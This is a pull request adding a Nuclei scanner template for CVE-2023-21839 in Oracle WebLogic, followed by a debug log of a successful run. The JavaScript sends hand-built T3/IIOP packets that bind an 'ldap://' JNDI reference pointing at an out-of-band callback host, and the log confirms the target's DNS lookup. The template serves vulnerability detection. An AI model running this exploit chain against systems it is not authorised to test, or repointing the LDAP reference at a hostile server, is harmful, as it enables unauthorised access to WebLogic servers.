### PR TITLE
Add CVE-2023-21839 (KEV and vKEV)

### DIFF
--- a/javascript/cves/2023/CVE-2023-21839.yaml
+++ b/javascript/cves/2023/CVE-2023-21839.yaml
@@ -1,0 +1,171 @@
+id: CVE-2023-21839
+
+info:
+  name: Oracle WebLogic Server - Unauthorized Access
+  author: daffainfo
+  severity: high
+  description: |
+    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
+    - https://github.com/houqe/POC_CVE-2023-21839
+    - https://web.archive.org/web/20230831012940/https://github.com/4ra1n/CVE-2023-21839
+    - https://www.labs.greynoise.io/grimoire/2023-04-21-oracle-weblogic-blog/
+    - https://www.oracle.com/security-alerts/cpujan2023.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-21839
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-21839
+    cwe-id: CWE-502,CWE-306
+    cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 7
+    vendor: oracle
+    product: weblogic_server
+    shodan-query: product:"oracle weblogic"
+  tags: cve,cve2023,oracle,weblogic,javascript
+
+javascript:
+  - pre-condition: |
+      isPortOpen(Host,Port);
+    code: |
+      let m = require('nuclei/net');
+      const nb = require('nuclei/bytes');
+
+      let address = Host+":"+Port;
+      let conn,conn2;
+      let wlsKey1,wlsKey2;
+
+      conn = m.Open('tcp', address);
+      conn2 = m.Open('tcp', address);
+
+      let str1 = "743320392e322e302e300a41533a3235350a484c3a39320a4d533a31303030303030300a50553a74333a2f2f746573743a373030310a0a";
+      conn.SendHex(str1);
+      resp_ver = conn.RecvString();
+      conn.Close();
+
+      let ver = resp_ver.slice(5, 7);
+
+      if (ver === '12') {
+        wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e3000000000000238000000000000014245412c000000100000000000000000{{key1}}";
+        wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e30000000000004{{key3}}000000014245412c000000100000000000000000{{key1}}";
+      } else if (ver === '14') {
+        wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e3000000000000238000000000000014245412e000000100000000000000000{{key1}}";
+        wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e30000000000004{{key3}}000000014245412e000000100000000000000000{{key1}}";
+      }
+
+      const buf = new nb.Buffer();
+      buf.WriteString("ldap://" + oast + "/test");
+      const hex = buf.Hex();
+      const length = buf.Len();
+      const ldapPayload = length.toString(16) + hex;
+
+      const str2 = "47494f50010200030000001700000002000000000000000b4e616d6553657276696365";
+      conn2.SendHex(str2);
+      let raw_resp = conn2.RecvString();
+
+      function bytesToHex(arr) {
+        let s = "";
+        for (let i = 0; i < arr.length; i++) {
+          const b = arr[i];
+          if (b === undefined || b === null) continue;
+          s += b.toString(16).padStart(2, "0");
+        }
+        return s;
+      }
+
+      const buf2 = new bytes.Buffer();
+      buf2.WriteString(raw_resp);
+      const raw = buf2.Bytes();
+
+      let ioff = 0x60;
+
+      while (raw[ioff] !== 0x00) ioff++;
+      while (raw[ioff] === 0x00) ioff++;
+      const lt = ioff - 0x60 + 1;
+
+      let foff = 0x60 + lt + 0x75;
+      while (raw[foff] === 0x00) foff++;
+
+      const key1Slice = raw.slice(foff, foff + 8);
+      const key1 = bytesToHex(key1Slice);
+
+      const key2Arr = new Uint8Array(8);
+      key2Arr[0] = 0xff; key2Arr[1] = 0xff; key2Arr[2] = 0xff; key2Arr[3] = 0xff;
+      const suffix = raw.slice(foff + 4, foff + 8);
+      for (let i = 0; i < suffix.length && i < 4; i++) {
+        key2Arr[4 + i] = suffix[i];
+      }
+      const key2 = bytesToHex(key2Arr);
+
+      let str3_request = "00000003030000000000000000000078" + wlsKey1.replace("{{key1}}", key1) +
+        "0000000b726562696e645f616e79000000000006000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000100000006000000f4000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000100000000000000b8000102000000000d3137322e32362e3131322e310000ec5b0000006400424541080103000000000100000000000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000331320000000000014245412a0000001000000000000000005eedafdebc0d227000000001000000010000002c00000000000100200000000300010020000100010501000100010100000000030001010000010109050100010000000f00000020000000000000000000000000000000010000000000000000010000000000000042454103000000140000000000000000" +
+        key2 +
+        "000000004245410000000004000a03010000000000000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000" +
+        ldapPayload;
+
+      let str_size = (str3_request.length / 2).toString(16).padStart(8, "0");
+      let str3 = "47494f5001020000" + str_size + str3_request;
+      conn2.SendHex(str3);
+      resp = conn2.RecvString();
+
+      let startoff = 0x64 + lt + 0xc0 + Host.length + 0xac + lt + 0x5d;
+
+      const buf3 = new bytes.Buffer();
+      buf3.WriteString(resp);
+      const raw2 = buf3.Bytes();
+
+      let key3;
+      while (raw2[startoff] !== 0x32) {
+          if (startoff > 0x2710) break;
+          startoff++;
+      }
+
+      if (startoff >= 0x2710) {
+        key3 = "32383900";
+      } else {
+        const key3Slice = raw2.slice(startoff, startoff + 4);
+        key3 = bytesToHex(key3Slice);
+      }
+
+      let str4_request = "00000004030000000000000000000078" +
+        wlsKey2.replace("{{key3}}", key3).replace("{{key1}}", key1) +
+        "0000000b726562696e645f616e79000000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000" +
+        key2 +
+        "000000004245410000000004000a030100000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000" +
+        ldapPayload;
+
+      str_size = (str4_request.length / 2).toString(16).padStart(8, "0");
+      let str4 = "47494f5001020000" + str_size + str4_request;
+      conn2.SendHex(str4);
+      resp = conn2.RecvString();
+
+      const str5 = "47494f50010200030000001700000005000000000000000b4e616d6553657276696365";
+      conn2.SendHex(str5);
+      resp = conn2.RecvString();
+
+      const str6 = "47494f50010200000000011100000006030000000000000000000078"+wlsKey1.replace("{{key1}}", key1)+"000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000"+key2+"000000004245410000000004000a030100000000000000010000000574657374000000000000000100";
+      conn2.SendHex(str6);
+      resp = conn2.RecvString();
+
+      const str7 = "47494f50010200000000011100000007030000000000000000000078"+wlsKey2.replace("{{key3}}", key3).replace("{{key1}}", key1)+"000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000"+key2+"000000004245410000000004000a030100000000000000010000000574657374000000000000000100";
+      conn2.SendHex(str7);
+      resp = conn2.RecvString();
+      Export(resp);
+
+      conn2.Close();
+
+    args:
+      Host: "{{Host}}"
+      Port: 7001
+      oast: "{{interactsh-url}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "contains(response, 'NamingContext/InvalidName')"
+          - "contains(interactsh_protocol, 'dns')"
+        condition: and


### PR DESCRIPTION
### Template / PR Information

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Debug

```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2023-21839] Executing Precondition for request
[DBG]  [CVE-2023-21839] Javascript Code:

        isPortOpen(Host, Port);

[DBG] [CVE-2023-21839] Precondition for request was satisfied
[INF] Using Interactsh Server: oast.me
[DBG] [CVE-2023-21839] Dumped Javascript request for REDACTED:7001:
Variables:
 map[string]interface {}:3 {
  "Host": "REDACTED",
  "Port": "7001",
  "oast": "d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me",
} address=REDACTED:7001
[DBG]  [CVE-2023-21839] Javascript Code:

        let m = require('nuclei/net');
        const nb = require('nuclei/bytes');
        let address = Host + ":" + Port;
        let conn, conn2;
        let wlsKey1, wlsKey2;
        conn = m.Open('tcp', address);
        conn2 = m.Open('tcp', address);
        let str1 = "743320392e322e302e300a41533a3235350a484c3a39320a4d533a31303030303030300a50553a74333a2f2f746573743a373030310a0a";
        conn.SendHex(str1);
        resp_ver = conn.RecvString();
        conn.Close();
        let ver = resp_ver.slice(5, 7);
        if (ver === '12') {
            wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e3000000000000238000000000000014245412c000000100000000000000000{{key1}}";
            wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e30000000000004{{key3}}000000014245412c000000100000000000000000{{key1}}";
        } else if (ver === '14') {
            wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e3000000000000238000000000000014245412e000000100000000000000000{{key1}}";
            wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e67436f6e74657874416e793a312e30000000000004{{key3}}000000014245412e000000100000000000000000{{key1}}";
        }
        const buf = new nb.Buffer();
        buf.WriteString("ldap://" + oast + "/test");
        const hex = buf.Hex();
        const length = buf.Len();
        const ldapPayload = length.toString(16) + hex;
        const str2 = "47494f50010200030000001700000002000000000000000b4e616d6553657276696365";
        conn2.SendHex(str2);
        let raw_resp = conn2.RecvString();
        // Export(raw_resp.length);

        function bytesToHex(arr) {
            let s = "";
            for (let i = 0; i < arr.length; i++) {
                const b = arr[i];
                if (b === undefined || b === null) continue;
                s += b.toString(16).padStart(2, "0");
            }
            return s;
        }
        const buf2 = new bytes.Buffer();
        buf2.WriteString(raw_resp);
        const raw = buf2.Bytes();
        let ioff = 0x60;
        while (raw[ioff] !== 0x00) ioff++;
        while (raw[ioff] === 0x00) ioff++;
        const lt = ioff - 0x60 + 1;
        let foff = 0x60 + lt + 0x75;
        while (raw[foff] === 0x00) foff++;
        const key1Slice = raw.slice(foff, foff + 8);
        const key1 = bytesToHex(key1Slice);
        const key2Arr = new Uint8Array(8);
        key2Arr[0] = 0xff;
        key2Arr[1] = 0xff;
        key2Arr[2] = 0xff;
        key2Arr[3] = 0xff;
        const suffix = raw.slice(foff + 4, foff + 8);
        for (let i = 0; i < suffix.length && i < 4; i++) {
            key2Arr[4 + i] = suffix[i];
        }
        const key2 = bytesToHex(key2Arr);
        let str3_request = "00000003030000000000000000000078" + wlsKey1.replace("{{key1}}", key1) +
            "0000000b726562696e645f616e79000000000006000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000100000006000000f4000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000100000000000000b8000102000000000d3137322e32362e3131322e310000ec5b0000006400424541080103000000000100000000000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000331320000000000014245412a0000001000000000000000005eedafdebc0d227000000001000000010000002c00000000000100200000000300010020000100010501000100010100000000030001010000010109050100010000000f00000020000000000000000000000000000000010000000000000000010000000000000042454103000000140000000000000000" +
            key2 +
            "000000004245410000000004000a03010000000000000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000" +
            ldapPayload;
        let str_size = (str3_request.length / 2).toString(16).padStart(8, "0");
        let str3 = "47494f5001020000" + str_size + str3_request;
        conn2.SendHex(str3);
        resp = conn2.RecvString();
        let startoff = 0x64 + lt + 0xc0 + Host.length + 0xac + lt + 0x5d;
        const buf3 = new bytes.Buffer();
        buf3.WriteString(resp);
        const raw2 = buf3.Bytes();
        let key3;
        while (raw2[startoff] !== 0x32) {
            if (startoff > 0x2710) break;
            startoff++;
        }
        // Export(startoff)

        if (startoff >= 0x2710) {
            key3 = "32383900";
        } else {
            const key3Slice = raw2.slice(startoff, startoff + 4);
            key3 = bytesToHex(key3Slice);
        }
        let str4_request = "00000004030000000000000000000078" +
            wlsKey2.replace("{{key3}}", key3).replace("{{key1}}", key1) +
            "0000000b726562696e645f616e79000000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000" +
            key2 +
            "000000004245410000000004000a030100000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000" +
            ldapPayload;
        str_size = (str4_request.length / 2).toString(16).padStart(8, "0");
        let str4 = "47494f5001020000" + str_size + str4_request;
        conn2.SendHex(str4);
        resp = conn2.RecvString();
        const str5 = "47494f50010200030000001700000005000000000000000b4e616d6553657276696365";
        conn2.SendHex(str5);
        resp = conn2.RecvString();
        const str6 = "47494f50010200000000011100000006030000000000000000000078" + wlsKey1.replace("{{key1}}", key1) + "000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000" + key2 + "000000004245410000000004000a030100000000000000010000000574657374000000000000000100";
        conn2.SendHex(str6);
        resp = conn2.RecvString();
        const str7 = "47494f50010200000000011100000007030000000000000000000078" + wlsKey2.replace("{{key3}}", key3).replace("{{key1}}", key1) + "000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000" + key2 + "000000004245410000000004000a030100000000000000010000000574657374000000000000000100";
        conn2.SendHex(str7);
        resp = conn2.RecvString();
        Export(resp);
        conn2.Close();

[DBG] [CVE-2023-21839] Dumped Javascript response for REDACTED:7001:
map[string]interface {}:2 {
  "response": "GIOPD4IDL:omg.org/CosNaming/NamingContext/InvalidName:1.0",
  "success": "true",
} address=REDACTED:7001
[d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy] Received DNS interaction from REDACTED at 2025-10-08 17:06:19
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 48621
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me.     IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 48621
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me.     IN       A

;; ANSWER SECTION:
d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me.      3600    IN      A       REDACTED

;; AUTHORITY SECTION:
d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me.      3600    IN      NS      ns1.oast.me.
d3j9k23v1g0kv4a8rs6gepewkuj8jqyuy.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       REDACTED
ns2.oast.me.    3600    IN      A       REDACTED


[CVE-2023-21839:dsl-1] [javascript] [high] REDACTED:7001
[INF] Scan completed in 12.739950959s. 1 matches found.
```